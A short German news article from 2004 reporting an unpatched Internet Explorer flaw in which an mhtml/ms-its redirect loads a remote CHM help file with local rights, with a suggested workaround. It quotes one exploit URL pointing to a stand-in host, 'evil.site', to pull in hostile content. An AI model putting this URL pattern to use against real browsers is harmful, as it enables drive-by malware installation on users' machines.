Internet Explorer: Schon Surfen ist gefährlich

9. April 2004, 14:16
18 Postings

Gefährliche Hilfe beim MS-Browser - Alle Versionen sind betroffen

Ein bereits seit einiger Zeit bekanntes Sicherheitsproblem in Microsofts Internet Explorer ist noch immer nicht behoben, mittlerweile wurden aber weitere Details dazu veröffentlicht. Zudem wird die Lücke bereits von ersten Würmern und Websites ausgenützt, um die Rechner von IE-Anwendern zu infizieren.

Besuch einer Website kann gefährlich sein

Durch den Fehler kann sich schon beim Besuchen einer Webseite automatisch Malware auf dem PC installieren. Schuld an dem Problem ist ein Redirect. Wird in einer mhtml-URL eine Hilfeseite angegeben, die es nicht gibt, dann lädt der Internet Explorer eine zweite Hilfedatei und startet diese mit den Rechten der ersten. Existiert C:\foo.mht nicht, so öffnet ms-its :mhtml:file://C:\foo.mht! http://evil.site/exploit.chm::exploit.htm die externe Hilfedatei, als wäre es eine lokale. So können von dieser dann zum Beispiel Dateien nachgeladen und Dateien auf dem lokalen Rechner überschrieben werden.

Kein Patch

Betroffen sind aller Versionen des Internet Explorers, Patch gibt es noch keinen. Als Workaround kann die Ausführung von CHM-Dateien deaktiviert werden, indem die Verknüpfung im Windows Explorer gelöscht wird.

Eine Demo zu der Schwachstelle ist hier zu finden. (red)

  • Bild nicht mehr verfügbar
Share if you care.